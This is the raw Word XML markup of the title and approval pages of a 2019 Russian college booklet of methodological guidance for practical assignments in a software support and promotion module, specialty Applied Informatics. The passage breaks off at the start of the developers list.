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1192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc495578196"/>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Министерство общего и профессионального образования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ростовской области</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Государственное бюджетное профессиональное образовательное учреждение Ростовской области</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E656E5" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00E21192" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Белокалитвинский гуманитарно-индустриальный техникум</w:t>
      </w:r>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>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AD2C0E" w:rsidRPr="00607C3B" w:rsidRDefault="00AD2C0E" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>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E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">МЕТОДИЧЕСКИЕ </w:t>
      </w:r>
      <w:r w:rsidR="00814C5C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>РЕКОМЕНДАЦИИ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00C85AC6" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">по выполнению </w:t>
      </w:r>
      <w:r w:rsidR="00E115DD" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">практических </w:t>
      </w:r>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>задани</w:t>
      </w:r>
      <w:r w:rsidR="00E115DD" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E115DD" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>по</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C85AC6" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>МДК 0</w:t>
      </w:r>
      <w:r w:rsidR="003F4267" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">.01 </w:t>
      </w:r>
      <w:r w:rsidR="00C85AC6" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сопровождение и продвижение программного обеспечения отраслевой направленности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">по специальности </w:t>
      </w:r>
      <w:r w:rsidR="00DB3939" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>09.02.05</w:t>
      </w:r>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Прикладная информатика (по отраслям)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>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AD2C0E" w:rsidRPr="00607C3B" w:rsidRDefault="00AD2C0E" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD2C0E" w:rsidRPr="00607C3B" w:rsidRDefault="00AD2C0E" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD2C0E" w:rsidRPr="00607C3B" w:rsidRDefault="00AD2C0E" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD2C0E" w:rsidRPr="00607C3B" w:rsidRDefault="00AD2C0E" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD2C0E" w:rsidRPr="00607C3B" w:rsidRDefault="00AD2C0E" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD2C0E" w:rsidRPr="00607C3B" w:rsidRDefault="00AD2C0E" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F20E5F" w:rsidRPr="00607C3B" w:rsidRDefault="00F20E5F" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F20E5F" w:rsidRPr="00607C3B" w:rsidRDefault="00F20E5F" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F20E5F" w:rsidRPr="00607C3B" w:rsidRDefault="00F20E5F" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F20E5F" w:rsidRPr="00607C3B" w:rsidRDefault="00F20E5F" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F20E5F" w:rsidRPr="00607C3B" w:rsidRDefault="00F20E5F" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F20E5F" w:rsidRPr="00607C3B" w:rsidRDefault="00F20E5F" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F20E5F" w:rsidRPr="00607C3B" w:rsidRDefault="00F20E5F" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD2C0E" w:rsidRPr="00607C3B" w:rsidRDefault="00AD2C0E" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD2C0E" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Белая Калитва</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>201</w:t>
      </w:r>
      <w:r w:rsidR="00DB3939" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> г.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00B56D78" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_s1054" style="position:absolute;left:0;text-align:left;margin-left:471.1pt;margin-top:82.05pt;width:13.6pt;height:13.05pt;z-index:251668480" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_s1029" style="position:absolute;left:0;text-align:left;margin-left:-.6pt;margin-top:82.05pt;width:9.05pt;height:13.05pt;z-index:251659264" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_s1027" style="position:absolute;left:0;text-align:left;margin-left:-.6pt;margin-top:102.75pt;width:11.9pt;height:14.75pt;z-index:251658240" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00E21192" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5920" w:type="dxa"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5920"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidTr="00B012EC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5920" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="00F20E5F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="1" w:name="bookmark0"/>
            <w:r w:rsidRPr="00607C3B">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:br w:type="page"/>
            </w:r>
            <w:r w:rsidRPr="00607C3B">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:br w:type="page"/>
              <w:t>РАССМОТРЕНО</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidTr="00B012EC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5920" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="00F20E5F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607C3B">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>предметной цикловой комиссией специальности  Прикладная информатика (по отраслям)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidTr="00B012EC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5920" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="00F20E5F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607C3B">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Протокол №____</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="00F20E5F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607C3B">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>от___________20____г</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidTr="00B012EC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5920" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="00F20E5F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607C3B">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Председатель</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="00F20E5F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="00F20E5F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607C3B">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">_____________ </w:t>
            </w:r>
            <w:r w:rsidR="003F4267" w:rsidRPr="00607C3B">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>М.П. Чернышова</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidTr="00B012EC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5920" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidTr="00B012EC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5920" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidTr="00B012EC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5920" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidTr="00B012EC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5920" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00AA61B4" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Методические </w:t>
      </w:r>
      <w:r w:rsidR="00E21192" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>указани</w:t>
      </w:r>
      <w:r w:rsidR="003F4267" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidR="00E21192" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> по выполнению практических </w:t>
      </w:r>
      <w:r w:rsidR="00C85AC6" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>заданий по</w:t>
      </w:r>
      <w:r w:rsidR="00E21192" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> МДК.0</w:t>
      </w:r>
      <w:r w:rsidR="003F4267" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00E21192" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">.01 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidR="00C85AC6" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Сопровождение и продвижение программного обеспечения отраслевой направленности </w:t>
      </w:r>
      <w:r w:rsidR="003F4267" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>предназначены для студентов, обучающихся</w:t>
      </w:r>
      <w:r w:rsidR="00E21192" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="bookmark2"/>
      <w:r w:rsidR="00E21192" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">по специальности </w:t>
      </w:r>
      <w:r w:rsidR="00DB3939" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>09.02.05</w:t>
      </w:r>
      <w:r w:rsidR="00E21192" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Прикладная информатика (по отраслям)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="00E21192" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="bookmark3"/>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="00F20E5F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="00F20E5F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Разработчики:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="00F20E5F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00130203" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="00F20E5F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Преподавател</w:t>
      </w:r>
      <w:r w:rsidR="00130203" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ГБПОУ РО </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
